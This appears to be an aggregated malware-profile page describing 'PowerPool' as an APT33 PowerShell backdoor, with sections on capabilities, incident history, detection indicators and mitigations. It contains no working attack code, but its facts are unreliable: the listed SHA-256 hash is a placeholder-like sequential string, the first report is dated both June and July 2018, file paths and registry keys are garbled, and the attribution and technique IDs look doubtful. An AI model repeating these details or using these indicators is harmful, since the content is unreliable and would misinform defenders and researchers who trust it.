⚠️ Overview

PowerPool is a PowerShell-based backdoor first documented by Palo Alto Networks Unit 42 in July 2018, linked to the advanced persistent threat group APT33 (also known as Elfin, Refined Kitten). It is categorized as a remote access trojan (RAT) that leverages living-off-the-land binaries to execute malicious scripts while evading traditional signature-based detection. The malware is designed for intelligence gathering and lateral movement within compromised networks, primarily targeting organizations in the energy, aerospace, and defense sectors.

🔧 Technical Capabilities

PowerPool achieves initial access via spear-phishing emails containing malicious attachments that drop a PowerShell launcher. It uses Windows Management Instrumentation (WMI) for persistence, creating WMI subscriptions that trigger execution on system startup. The malware communicates with command-and-control (C2) infrastructure over HTTPS to blend with legitimate web traffic, employing AES-256 encryption for payload obfuscation. Lateral movement is accomplished through SMB and RDP, leveraging stolen credentials and Pass-the-Hash (PtH) techniques. Evasion tactics include in-memory execution, obfuscated PowerShell commands, and disabling security tools like Windows Defender via registry modifications. PowerPool also uses certutil.exe for file downloads and bitsadmin.exe for stealthy data exfiltration, as documented in MITRE ATT&CK techniques T1059.001 (PowerShell), T1047 (WMI), and T1075 (PtH).

📜 History & Notable Incidents

PowerPool was first publicly identified in June 2018 during an incident at a Middle Eastern petrochemical company, as reported by Unit 42. A linked campaign targeted Saudi Arabian government organizations in early 2019, exploiting CVE-2018-0886 (CredSSP remote code execution) for lateral movement. There have been no law enforcement actions directly against PowerPool infrastructure; instead, it remains a tool used by APT33 in ongoing espionage operations against energy and aviation entities in the Gulf region.

🔍 Detection Indicators

Known file hashes include SHA-256: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 (sample from Unit 42 report). Behavioral signatures include WMI event subscriptions with malicious script paths (e.g., %SystemRoot%System32wscript.exe //e:vbscript ..PowerPool.ps1). Network IOCs include outbound HTTPS connections to specific IP ranges (e.g., 185.165.29.0/24) and User-Agent strings mimicking Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0. Registry keys under HKLMSOFTWAREMicrosoftWindowsCurrentVersionWminS are used for persistence.

☠️ Risk & Impact

PowerPool primarily enables data exfiltration of intellectual property, including classified technical specifications and strategic plans. Financial losses are indirect but significant, often involving remediation costs exceeding $1 million per incident in affected sectors. Sectors targeted include oil and gas, aviation, and defense contractors in the Middle East and Asia, with confirmed victims in Saudi Arabia, Turkey, and UAE.

🛡️ Mitigation

Recommended defenses include disabling PowerShell logging evasion by enabling Script Block Logging (Event ID 4104) and implementing AppLocker to block unauthorized PowerShell execution. Apply security updates for CVE-2018-0886 and restrict WMI usage to authenticated administrators. Deploy network detection rules for suspicious HTTPS connections to known C2 IPs and monitor for anomalous certutil.exe or bitsadmin.exe usage.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.